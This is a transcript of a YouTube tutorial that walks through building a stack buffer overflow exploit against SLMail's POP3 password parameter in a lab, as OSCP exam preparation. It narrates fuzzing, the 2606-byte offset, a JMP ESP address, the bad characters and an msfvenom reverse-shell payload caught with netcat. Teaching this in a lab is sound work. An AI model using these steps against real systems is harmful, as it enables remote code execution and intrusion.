Hello everyone, welcome to my YouTube channel. In this video, I am going to explain you about stack-based buffer overflow. To do this, I have a Windows 7 operating system running on 192.168.1.22. I have two applications installed on this machine. One is a vulnerable version of SLMail. To install it on your machine, you can just do a Google search calling SLMail exploit DB and you will be redirected to a page. You can download the SLMail vulnerable version to your machine. The SLMail, this particular version is vulnerable on POP3 port on password parameter. I'll be showing you how to develop the exploit for it and obtain a reversion. If you are planning for a OSCP exam, the OSCP exam has a buffer overflow mission which carries 25 mark, and if you are really comfortable with buffer overflow, it is pretty much sure you obtain 25 out of 70. So like 70 is the pass rate, so you will have one more 25 missions and 120 mission you clear the OSCP exam. So buffer overflow is one of the critical mission on OSCP exam. This apart, buffer overflow will give you a lot of knowledge about how the stack works, okay, how the memory stack works, and it also shows you the exploit development. Let's pitch in directly into the exploitation. So I have the machine, Windows machine with the SLMail installed and a POP3 opened on it. I just give netstart-an and you could see that I'll be having 110 open on that machine. So I'll connect it from my Kali Linux machine saying NC 192.168.1.22. 22 is my Windows machine, and then connect to port 110. And you could see there is a banner which is open on POP3. When I say user test, it says OK, and when I say password test, and it says OK, mailbox for test has 0 messages, and when I say quit, I exit from the POP3 port. Now you could see that when I give the right username and right password, I get the mailbox details, and the parameter which is vulnerable for buffer overflow is the password parameter. Instead of giving test, in case if I am going to give 2000 characters, 3000 characters or 4000 characters, now for every input parameter on a program, you specify a buffer size. You could say int 10, int 20, int 30. So that is the buffer size, right? So what we could do is, like, in case if we increase more and more buffer, that is particular place where the buffer gets overwritten, and then there is a pointer called extended base pointer. It gets overwritten, and then there is a return address which gets overwritten and the program gets crashed. This is called buffer overflow. So going forward on the practical front, I will explain you about this pointers, and I will show you how to override the pointer and then take it forward till the reversion. So let's pitch in directly. Instead of connecting through the NC, I can even connect this through a Python script. I'll show you how to connect through a Python script. To do this, I'll just say nano slmail.py. I already have that file. Let me delete it and now clear it, and then say nano slmail.py to build it from scratch, and then I say /user bin python, and since it is going to connect through a TCP port, I import a library called socket. I just say s equal to socket.socket and say socket dot, I think it is af underscore inet to connect through IP version 4, and then socket dot sock underscore stream for TCP connection, and when I say s dot connect and give the IP address of my SLMail server, which is 192.168.1.22 with the port number as 110, and I say s dot receive 1024 because it receives a banner there, and when I say s dot send, I could say the username is test, and say s dot receive 1024, which receives after that, it gives a welcome message after that, and when I say s dot send with the password, it sends the password to the server, and say s dot receive. To receive that, it says 0 messages, right? So to that message to receive from the server, I say s dot receive and say s dot close and close this. Now when I run this SLMail file, it gets no information, but the script actually executed. To get more clarity, what we will do is we'll just say data there and print the data. so which will give you the message data equal to, and then say print data. Similarly on the password field I say this, and then say print data. Now save it and I run it. So you could see that instead of doing that manually, I have an SLMail Python script created, and I'm able to successfully do that with a Python script. So this is from where we always start with the buffer overflow. Now I have already said you that the password parameter is vulnerable for buffer overflow exploit. So you can just Google search and say SLMail POP3, you will be able to get that vulnerability. So in case if we are not aware about the parameter, what we normally do is we first each and every parameter to find the buffer overflow. But here it is pretty much clear that the POP3 port and the password parameter is vulnerable for buffer overflow. So we will directly get into the exploit development. Fine. So the first step that we need to do is to identify the buffer size. Let's say for example I'll edit this file directly. So I've said that the password parameter is vulnerable for buffer overflow, and I've given a 4 character length here. Instead of that, let's say for example if I'm going to say buffer equal to a into, let's say 4000, and then say instead of password as test, we'll just say buffer. So now what happens is like 4000 A's will be put here, and it will be checking that whether the application crashes or not. So now I'll save this, and now we need to analyze it to get more clarity. So to do that, what I have done is on my Windows machine I have installed an application called Immunity Debugger. So this will give us more information about how this program works, where the application crashed, what is the size of the buffer, what are the stack pointers address, so what is the return address. So we'll get all this information from the debugger. So what I will do is I'll just maximize this so that you get more clarity on it, and then I open Immunity Debugger here. I'll run it as administrator. Now I click file and attach, and I'll attach the SLMail, and you could see the program runs here. Not sure if I can maximize. Let me check if I can maximize it. Fine, let me proceed it like this. I'll explain you, or I'll zoom a bit later. Let me bold it so that you get more details. Fine. So I've opened SLMail here, and then I just clicked start running, and then now what we can do is, okay, we will edit. We have already edited the SLMail to say 4000 here, and now when I run, so you could see here I've edited the SLMail already. So I'll just run Python 2 and then say SLMail and enter. It throws an error. I'll just modify the error. I have a double quotes to be open here. I'll just say double quotes, save it, and now run it again, and you could see that the application crashed somewhere, and you could say that the program access violation when executing 414141. So 4141 is the hexadecimal equivalent of A, and you could see that the EIP value here is 4141. So let me explain before we get into more detail. You could see that there is an ESP, which is the extended stack pointer, and it has an address, and you could see that there are a lot of EAs here. So this stack pointer will hold like the next text which is input by the users will be here, and there is a base pointer. Here you could see that the base pointer is written by AAA now, and the EIP is overwritten. EIP will be the return address, and it is written by 4141. Now this EIP will say where the program should go for the next address where the program should look into, but this is overwritten by 4141. That's why the program got stopped and it got stuck, right? So when we have 4000 bytes here or 4000 A's here, what happens is it is overwriting the EIP here and the program gets crashed, right? So instead of that, what we need to do is we need to find exactly what is the size of the buffer for us to do a buffer overflow exploit. To do this, I have a technique with me. I'll explain you that. Before that, the program got crashed. So what we will do is we'll close the debugger once and then open SLMail and start the service again. So I go to control, the status is stopped, I'll just start it again. So once I started, I open my Immunity Debugger as an administrator and then attach SLMail and attach it. And then click play. Fine. Now what I will do is, I need to exactly find what is the buffer size. To do that, I just say nano slmail.py. Instead of buffer of 4000, I need to find the exact buffer size. To do this, let me open a new tab and I need to input unique 4000 characters. To do that, I just say locate, and there is a Ruby script for it called pattern create. So I'll just copy this and then paste it and then say -l and say 4000. So this is unique 4000 characters. So what I will do is I'll just copy it and then open my SLMail script, and instead of this buffer of 4000, let me paste the unique 4000 characters there and save it and close this. Now let's run the program again. So we are ready to run the program again. So what we will do is, I'll just say python2 slmail.py and enter. And you could see the program got crashed again, but this time the program got crashed on 39694438. So there's a unique number here instead of 4141, which is the A. You can see a unique value here, and the ESP is having the subsequent random characters here, and you could see the EBP. The EBP is having 69443769, and the EIP is overwritten with 39694438. Now that is the buffer size. So what we could do is, we can actually find what is the size with this number. We'll just note down this number 39694438 and go to our Kali Linux machine. On my Kali Linux machine, I have one more Ruby script. I think it is pattern offset. Copy it, paste it, and then say -q and give the value there. The value is 39694438. So I say 39694438. And you could see the exact match at offset is 2606. Now this is where, this is the buffer size, and after the buffer size is where we need to put our exploit code, right? So I'll just one more time edit my SLMail Let me edit it using GlyphPad, which is more comfortable for me. And instead of this buffer size, let me delete this and then say A is 2606 this time, and then post that we will add B, which is 4 characters, which will be written on the EIP. Now what we get is, in case if the program is crashed, we get it on B, okay, which is 424242. And then to put our exploit code further, we'll just say C, and at least we'll ensure that we have 400 bytes there, and save the script. Close the script and then go to my Windows machine and do the same again. Let me open my SL mail. Let me not stop it again. I'll just have this browser open and then start the service. Open the Immunity Debugger as administrator and then attach SL mail and then play it. Let me do one thing. I'll just change the screen resolution. I don't think so. Fine. So the program is running now. Now what we will do is we'll go for the Python script again and then say python2 slmail.py. So the script runs again and you could see the program got crashed on 42424242, which means B, and post that on your stack pointer you have C, right? So this is the exact buffer size. So we know the buffer size, okay, and the buffer is now, like, the EAP is now overwritten with 42424242. Now where the program goes next is 42424242, and that's why it cannot find the address and you have the access violation set there. Instead of that, if we can give a right address, okay, where our shell code is, automatically the EIP will redirect to the shell code and the shell code gets executed. Now where is our shell code? We are going to put our shell code on ESP, right, where we have the C's, right? So what we need to do is we need to say, instead of writing 4242, jump to ESP, so that the shell code which we are going to put on the ESP is going to get executed. Now we need to find on the program where we have jump ESP and copy the address and put it on the EIP after 2606 bytes. To do this, you need to download a module called To do this, you need to download a module called Mona Modules. What you can do is you can just open your browser. On your browser, you could just say Mona Python script, okay, and you will be redirected to a link where you can download the Python script. Once you have that Python script, you can go to your Immunity Debugger. I'll just show you the location. You download this, and once you download it, go to your Immunity Debugger, which is on C:, Program Files, Immunity Debugger, and you have py commands, and paste it here. So I have already pasted it, which is mona.py. You can just paste it here, and now open your Immunity Debugger and then say Mona Modules and enter. Now what we are doing is we are finding a particular module which is going to have jump ESP on it, and once we have found the jump ESP, we will copy that address, and that address will be overwritten on EIP so that it redirects to the shell code and the shell code gets executed. Now you could see that there are a lot of DLLs and EXEs here, but we need to get the right DLL and right EXE on this machine. Just ensure that the rebase, safe SEH, ASLR, all this is set to false. Okay, you could see that there is an EXE which is set to false here. We will not be able to take the EXE jump ESP address because the EXE addresses will be changed whenever you restart your machine. So we need to capture it from a DLL file. So there is one DLL called slmfc.dll. Now this is the right DLL file which we need to capture. You could see false set to all. So we need to use this and find the jump ESP address. So what I will do is I'll close this, and here on the Mona modules I just say find -s, and to find the jump ESP just say xff/xe4 and then say the module name. The module name is slmfc.dll and enter. So you could see that there are a lot of addresses here. Let's pick up the first one. The first one says 5F, 4A, 35 and 8F. Now this is going to be the return address. Let me minimize this and go to my Python script again. And instead of B, what I do is we need to write it on a reverse side. So I'll just say X. I'll just copy 8F first and 35 next. So 8F, 35, 4A and 5F. So I'll just say 4A next 5F, and that's going to be my return address. So now we can run it again. So to do this, I'll just close this, and our program is still running, or it got crashed. It got crashed, so I'll close this program, restart my service again, run my Immunity debugger, attach the SLMail service and play it again. So now we are ready to run it again. So what I will do is I'll just say Python SLMail and enter. Let me run it on Python 2 and enter. It gets crashed again, and this time let's say right click and follow and dump. On the dump, if you can look at it, you could see after 414141, which is A, 8F, 35, 4A and 5F is written here, and post that we have 43, 43, 43, 43, which is C. This is where we are going to put our shell code. Now this is the return address which we are going to override the EIP. So till this, if we are clear, the next step that we need to do is, when we write a shell code, there are certain things called bad characters which we need to identify. Otherwise, when we develop a shell code and if we do it, the shell gets crashed. Okay, so I just don't want to do it again as a research for you because it gets confused to you. So what we will do is, let's identify the bad characters and then eliminate those things from our shell code. To identify the bad characters, we have an easy method. Let's open our browser. And then on the Google search, we'll just say bad characters list buffer overflow. Just Google search this, you'll get some link with the bad characters list. And here we have the bad character list. I'll just copy this, go to my code and open up the Python script through LeafPad. And instead of okay, let me add a new word called bad cat and then paste all these bad characters or it is already having bad cat, so I'll just paste this like this. So we have pasted the bad characters here, and now instead of C400, let's say bad cats, and save this file. And now let's close this leaf pad and run this again. Prior to this, the application is already crashed, so let me close this, start it up again, and then open my Unity debugger, attach SLMail, and then play it. Okay, so now we are good to go on running the script. We'll just say SLMail and enter. So the application got crashed now. So what we will do is, we'll just click ESP, right click and say follow and dump. And when you can look into it, you could see that we have 4141 ending and then our return address. And after that, we have 01, 02, 03, 04, it continues 08, 09. And after that, our bad character list was having 0A, but here you could see that it is 29. You could see it's 29. So what we could do is, let me close this, open my SLMail script and delete 0A from my script. So that's bad character, so I'll delete that, save it again and repeat this step again. Close this SLMail again and then open my remote desktop, close my Unity debugger, start the service and then open my Unity debugger again, attach the file, play it again and now run my script again. And continue my bad character detection. I'll click my ESP and follow it down. And you could see now, so we have 01, 02, 03, 08, 09 and after that we have deleted 0A, which is a bad character, 0B, 0C, and you could not see 0D here, which is a bad character, and then it continues 0E, 0F. So what we will do is we will delete 0D and continue it. So I'll do the same thing. Start the service again and then open my SLMail and delete 0D. And save it. We close the service again. I close the service, I close the file again. Let me open my Unity debugger again and then attach the service. So we need to repeat till we identify the complete list of bad characters. Play it and run my script again. And go back to the Unity debugger, right click the ESP and follow and dump. And now we have 0C and 0D is removed, 0E, 0F, 10, 11, 12 and we need to continue this. I have a shortcut here. What we will do is we'll have 12, 1A, 22, 2A. So it continues here, right? 22, 2A, 32, 3A, 42, 4A, 52, 50A. So we'll know that, in case if there is something which is a bad character, we'll not have this on a sequence here. 6A, 72, 7A, 82, 8A, 92, 9A, A2, AA, B2, BA, C2, CA, D2, DA, E2, EA, F2, FA. After the FA, it is FB, FC, FD, FE, FF. So these are the characters which is allowed on the shell code. So now we identified that 0A and 0D is the bad characters of this particular program. So let's do this let's stop this again and start developing a shell code for it. So to develop the shell code, just say msf venom -p Windows shell _reverse _ TCP. In case if we need to get the shell on an NC, we'll just say a shell _reverse _ TCP. In case if we need to get it on a Metasploit console, we'll just say shell /reverse _ TCP. In case if you are going to do a OSCP exam, I would recommend that you use shell _reverse _ TCP and then get it on an NC. And then now it's a time we need to mention our localhost. Our localhost IP address is 192.168.1.19. So I just specify 192.168.1.19 and then say L port, which is the local port, and we'll say 4444 and -f. I need the output on C. I say -fc, and then I see the bad characters. 00 is a return like enter, so we'll just remove that also, and then say 0A as one of the bad character and 0D as one of the bad character, and then press enter. So this will develop as a shell code. Now let it generate. Now what I will do is I'll just open a leaf pad and have it ready so that we edit it. So we have the shell code here. I'll just copy the shell code, and this is not going to have bad characters because we eliminated it. I open my leaf pad, and then instead of this bad characters, I'll paste this and then save it. Right. For the shell code to execute correctly, what we will do is we will add some null characters to this before the shell code starts. Okay, and I'll add 10 null characters to it, a random number, and then save this. And now we are good to go for the exploit. So to do that, what I will do is I'll just open one more prompt and then say nc-nlvp and open the port as a listening port. And now we could say python 2 and slmail, and let's ensure that the service is running and then press enter. And let's open the NC terminal now, and you could see that we got this shell. So this is how to exploit. We have a little bit of thing that we need to do here. Let me exit this and open my NC again and try to exploit it again. Now you could see the connection refused because the application got crashed once we exit the terminal. To be on a safer side, what we could do is, when we develop the shell code, we could say exit function equal to thread. And now when we develop a shell code like this and we put it on our exploit code, even if we are going to exit the shell, we will still have the service running. So let me stop the listener, open my leaf pad, and copy my shell code and paste it here. And save it. Start my listener and run my slmail. But prior to that, the status is stopped now, so we'll start it on our Windows machine and run it again. Now we have the shell. Now let me exit it and start the service, start the NC again and run it again, and you could see that the service doesn't crash. So we need to use the exit function as a thread to ensure that the application service doesn't crash.